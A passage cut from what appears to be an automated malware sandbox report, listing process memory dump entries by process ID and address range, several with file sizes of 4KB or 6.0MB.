                                                                                                                                                                                                                                                                                                              • memory/4476-307-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                              • memory/4496-350-0x00000000056B0000-0x0000000005CB6000-memory.dmp
                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                6.0MB

                                                                                                                                                                                                                                                                                                              • memory/4496-347-0x0000000000417E8A-mapping.dmp
                                                                                                                                                                                                                                                                                                              • memory/4524-352-0x0000000001232000-0x0000000001233000-memory.dmp
                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                                              • memory/4524-345-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                              • memory/4524-349-0x0000000001230000-0x0000000001231000-memory.dmp
                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                                              • memory/4544-287-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                              • memory/4672-324-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                              • memory/4672-327-0x0000000000720000-0x0000000000721000-memory.dmp
                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                                              • memory/4836-335-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                              • memory/4848-364-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                              • memory/4872-362-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                              • memory/4892-365-0x0000000000402F68-mapping.dmp
                                                                                                                                                                                                                                                                                                              • memory/4896-336-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                              • memory/4916-368-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                              • memory/4996-360-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                              • memory/5012-301-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                              • memory/5028-332-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                              • memory/5028-340-0x0000000005630000-0x0000000005631000-memory.dmp
                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                                              • memory/5056-302-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                              • memory/5096-303-0x0000000000000000-mapping.dmp